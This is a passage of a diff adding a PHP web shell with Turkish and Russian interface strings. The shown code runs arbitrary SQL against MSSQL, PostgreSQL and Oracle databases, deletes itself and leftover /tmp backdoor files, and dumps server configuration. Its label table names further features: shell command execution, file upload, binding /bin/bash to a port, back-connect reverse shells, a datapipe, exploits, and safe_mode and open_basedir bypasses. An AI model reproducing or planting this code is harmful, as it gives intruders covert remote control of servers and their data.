+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }
+   	@mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>MSSQL server ile baglanti Kurulamadi</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }
+   	@pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>PostgreSQL server ile baglanti kurulamadi</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b> Oracle server ile baglanti kurulamadi<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    {
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat);
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" SQL Sorgusu Iste \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+   die();
+ }
+/*
+&#1042;&#1099;&#1073;&#1086;&#1088; &#1103;&#1079;&#1099;&#1082;&#1072;
+$language='eng' - &#1088;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081;
+$language='ru' - &#1072;&#1085;&#1075;&#1083;&#1080;&#1081;&#1089;&#1082;&#1080;&#1081;
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1085;&#1072;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;',
+'ru_text2' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;',
+'ru_text3' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1091;',
+'ru_text4' =>'&#1056;&#1072;&#1073;&#1086;&#1095;&#1072;&#1103; &#1076;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103;',
+'ru_text5' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;',
+'ru_text6' =>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text7' =>'&#1040;&#1083;&#1080;&#1072;&#1089;&#1099;',
+'ru_text8' =>'&#1042;&#1099;&#1073;&#1077;&#1088;&#1080;&#1090;&#1077; &#1072;&#1083;&#1080;&#1072;&#1089;',
+'ru_butt1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;',
+'ru_butt2' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1080;&#1090;&#1100;',
+'ru_text9' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1080;&#1077; &#1087;&#1086;&#1088;&#1090;&#1072; &#1080; &#1087;&#1088;&#1080;&#1074;&#1103;&#1079;&#1082;&#1072; &#1077;&#1075;&#1086; &#1082; /bin/bash',
+'ru_text10'=>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100; &#1087;&#1086;&#1088;&#1090;',
+'ru_text11'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072;',
+'ru_butt3' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100;',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-&#1072;&#1076;&#1088;&#1077;&#1089;',
+'ru_text14'=>'&#1055;&#1086;&#1088;&#1090;',
+'ru_butt4' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;',
+'ru_text15'=>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1089; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1086;&#1075;&#1086; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;',
+'ru_text16'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text17'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text18'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text21'=>'&#1053;&#1086;&#1074;&#1086;&#1077; &#1080;&#1084;&#1103;',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;',
+'ru_text24'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1093;&#1086;&#1089;&#1090;',
+'ru_text25'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;',
+'ru_text26'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_butt5' =>'&#1047;&#1072;&#1087;&#1091;&#1089;&#1090;&#1080;&#1090;&#1100;',
+'ru_text28'=>'&#1056;&#1072;&#1073;&#1086;&#1090;&#1072; &#1074; safe_mode',
+'ru_text29'=>'&#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1079;&#1072;&#1087;&#1088;&#1077;&#1097;&#1077;&#1085;',
+'ru_butt6' =>'&#1057;&#1084;&#1077;&#1085;&#1080;&#1090;&#1100;',
+'ru_text30'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1092;&#1072;&#1081;&#1083;&#1072;',
+'ru_butt7' =>'&#1042;&#1099;&#1074;&#1077;&#1089;&#1090;&#1080;',
+'ru_text31'=>'&#1060;&#1072;&#1081;&#1083; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;',
+'ru_text32'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; PHP &#1082;&#1086;&#1076;&#1072;',
+'ru_text33'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; open_basedir &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1080; cURL',
+'ru_butt8' =>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1080;&#1090;&#1100;',
+'ru_text34'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1102; include',
+'ru_text35'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1079;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1091; &#1092;&#1072;&#1081;&#1083;&#1072; &#1074; mysql',
+'ru_text36'=>'&#1041;&#1072;&#1079;&#1072;',
+'ru_text37'=>'&#1051;&#1086;&#1075;&#1080;&#1085;',
+'ru_text38'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100;',
+'ru_text39'=>'&#1058;&#1072;&#1073;&#1083;&#1080;&#1094;&#1072;',
+'ru_text40'=>'&#1044;&#1072;&#1084;&#1087; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_butt9' =>'&#1044;&#1072;&#1084;&#1087;',
+'ru_text41'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1077;',
+'ru_text42'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072;',
+'ru_text43'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083;',
+'ru_butt10'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100;',
+'ru_butt11'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text44'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072; &#1085;&#1077;&#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;! &#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1076;&#1083;&#1103; &#1095;&#1090;&#1077;&#1085;&#1080;&#1103;!',
+'ru_text45'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1093;&#1088;&#1072;&#1085;&#1077;&#1085;',
+'ru_text46'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; phpinfo()',
+'ru_text47'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1085;&#1072;&#1089;&#1090;&#1088;&#1086;&#1077;&#1082; php.ini',
+'ru_text48'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1074;&#1088;&#1077;&#1084;&#1077;&#1085;&#1085;&#1099;&#1093; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074;',
+'ru_text49'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1072; &#1089; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;',
+'ru_text50'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1088;&#1086;&#1094;&#1077;&#1089;&#1089;&#1086;&#1088;&#1077;',
+'ru_text51'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1072;&#1084;&#1103;&#1090;&#1080;',
+'ru_text52'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;',
+'ru_text53'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;',
+'ru_text54'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_butt12'=>'&#1053;&#1072;&#1081;&#1090;&#1080;',
+'ru_text55'=>'&#1058;&#1086;&#1083;&#1100;&#1082;&#1086; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_text56'=>'&#1053;&#1080;&#1095;&#1077;&#1075;&#1086; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;&#1086;',
+'ru_text57'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100; &#1060;&#1072;&#1081;&#1083;/&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;',
+'ru_text58'=>'&#1048;&#1084;&#1103;',
+'ru_text59'=>'&#1060;&#1072;&#1081;&#1083;',
+'ru_text60'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;',
+'ru_butt13'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;',
+'ru_text61'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;',
+'ru_text62'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;&#1072;',
+'ru_text63'=>'&#1060;&#1072;&#1081;&#1083; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;',
+'ru_text64'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1072;',
+'ru_text65'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;',
+'ru_text66'=>'&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'&#1050;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;',
+'ru_text69'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;1',
+'ru_text70'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;2',
+'ru_text71'=>"&#1042;&#1090;&#1086;&#1088;&#1086;&#1081; &#1087;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;:\r\n- &#1076;&#1083;&#1103; CHOWN - &#1080;&#1084;&#1103; &#1085;&#1086;&#1074;&#1086;&#1075;&#1086; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103; &#1080;&#1083;&#1080; &#1077;&#1075;&#1086; UID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHGRP - &#1080;&#1084;&#1103; &#1075;&#1088;&#1091;&#1087;&#1087;&#1099; &#1080;&#1083;&#1080; GID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHMOD - &#1094;&#1077;&#1083;&#1086;&#1077; &#1095;&#1080;&#1089;&#1083;&#1086; &#1074; &#1074;&#1086;&#1089;&#1100;&#1084;&#1077;&#1088;&#1080;&#1095;&#1085;&#1086;&#1084; &#1087;&#1088;&#1077;&#1076;&#1089;&#1090;&#1072;&#1074;&#1083;&#1077;&#1085;&#1080;&#1080; (&#1085;&#1072;&#1087;&#1088;&#1080;&#1084;&#1077;&#1088; 0777)",
+'ru_text72'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;',
+'ru_text73'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;',
+'ru_text74'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_text75'=>'* &#1084;&#1086;&#1078;&#1085;&#1086; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100; &#1088;&#1077;&#1075;&#1091;&#1083;&#1103;&#1088;&#1085;&#1086;&#1077; &#1074;&#1099;&#1088;&#1072;&#1078;&#1077;&#1085;&#1080;&#1077;',
+'ru_text76'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093; &#1089; &#1087;&#1086;&#1084;&#1086;&#1097;&#1100;&#1102; &#1091;&#1090;&#1080;&#1083;&#1080;&#1090;&#1099; find',
+'ru_text77'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1089;&#1090;&#1088;&#1091;&#1082;&#1090;&#1091;&#1088;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_text78'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099;',
+'ru_text79'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1089;&#1090;&#1086;&#1083;&#1073;&#1094;&#1099;',
+'ru_text80'=>'&#1058;&#1080;&#1087;',
+'ru_text81'=>'&#1057;&#1077;&#1090;&#1100;',
+'ru_text82'=>'&#1041;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_text83'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1072;',
+'ru_text84'=>'SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;',
+'ru_text85'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1074; MSSQL &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Komut Uygula',
+'eng_text2' =>'Server uzerinde komut calistir',
+'eng_text3' =>'Komut istemi',
+'eng_text4' =>'Calisma dizini',
+'eng_text5' =>'Servere Dosya Upload et',
+'eng_text6' =>'Yerel Dosya',
+'eng_text7' =>'Dizin Veya Dosya Bul',
+'eng_text8' =>'Sec',
+'eng_butt1' =>'Uygula',
+'eng_butt2' =>'Yukle',
+'eng_text9' =>'Porta baglan /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Sifre Giris',
+'eng_butt3' =>'Baglan',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Baglan',
+'eng_text15'=>'Uzaktan servere dosya yukle',
+'eng_text16'=>'ile',
+'eng_text17'=>'Uzak Dosya',
+'eng_text18'=>'Yerel Dosya',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Kullan',
+'eng_text21'=>'&nbsp;Yeni ad',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Yerel port',
+'eng_text24'=>'Uzak host',
+'eng_text25'=>'Uzak port',
+'eng_text26'=>'Kullan',
+'eng_butt5' =>'Iste',
+'eng_text28'=>'Guvenlik Modunda Calis',
+'eng_text29'=>'Giris Yasak',
+'eng_butt6' =>'Degistir',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Goster',
+'eng_text31'=>'Dosya Bulunamadi',
+'eng_text32'=>'PHP kod degerlendir',
+'eng_text33'=>'cUcurlL fonksiyonu ile open_basedir atlamayi test et.',
+'eng_butt8' =>'Testet',
+'eng_text34'=>'Includes fonksiyonu ile Guvenlik modunu atlamayi test et.',
+'eng_text35'=>'Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et.',
+'eng_text36'=>'Database[VeriTabani]',
+'eng_text37'=>'Kullanici',
+'eng_text38'=>'Sifre',
+'eng_text39'=>'Tablo',
+'eng_text40'=>'Dump database table[DB Tablosu dok]',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'DB dosyalarini kaydet.[Dump filed]',
+'eng_text42'=>'Dosya Duzenle',
+'eng_text43'=>'Dosya Duzenlemek icin',
+'eng_butt10'=>'Kaydet',
+'eng_text44'=>'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor',
